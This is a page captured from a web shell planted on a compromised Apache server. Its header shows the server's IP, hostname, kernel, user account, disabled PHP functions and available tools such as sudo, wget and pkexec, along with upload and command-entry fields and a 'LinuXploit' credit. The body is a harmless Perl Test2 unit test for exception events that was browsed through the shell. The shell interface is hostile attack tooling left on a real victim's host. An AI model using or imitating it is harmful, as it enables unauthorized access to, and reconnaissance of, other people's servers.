403Webshell
Server IP : 51.89.169.208  /  Your IP : 18.191.251.36
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/usr/share/doc/perl-Test-Simple/t/Test2/modules/Event/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/share/doc/perl-Test-Simple/t/Test2/modules/Event/Exception.t
use strict;
use warnings;
use Test2::Tools::Tiny;
use Test2::Event::Exception;

my $exception = Test2::Event::Exception->new(
    trace => {frame => []},
    error => "evil at lake_of_fire.t line 6\n",
);

ok($exception->causes_fail, "Exception events always cause failure");

is($exception->summary, "Exception: evil at lake_of_fire.t line 6", "Got summary");

ok($exception->diagnostics, "Exception events are counted as diagnostics");

my $facet_data = $exception->facet_data;
ok($facet_data->{about}, "Got common facet data");

is_deeply(
    $facet_data->{errors},
    [{
        tag => 'ERROR',
        fail => 1,
        details => "evil at lake_of_fire.t line 6\n",
    }],
    "Got error facet",
);

my $hash = {an => 'error'};
my $str = "$hash";

$exception = Test2::Event::Exception->new(
    trace => {frame => []},
    error => $hash,
);

ok($exception->causes_fail, "Exception events always cause failure");

is($exception->error, $str, "Got stringified exception");

$facet_data = $exception->facet_data;
ok($facet_data->{about}, "Got common facet data");

is_deeply(
    $facet_data->{errors},
    [{
        tag => 'ERROR',
        fail => 1,
        details => $str,
    }],
    "Got error facet",
);

done_testing;

Youez - 2016 - github.com/yon3zu
LinuXploit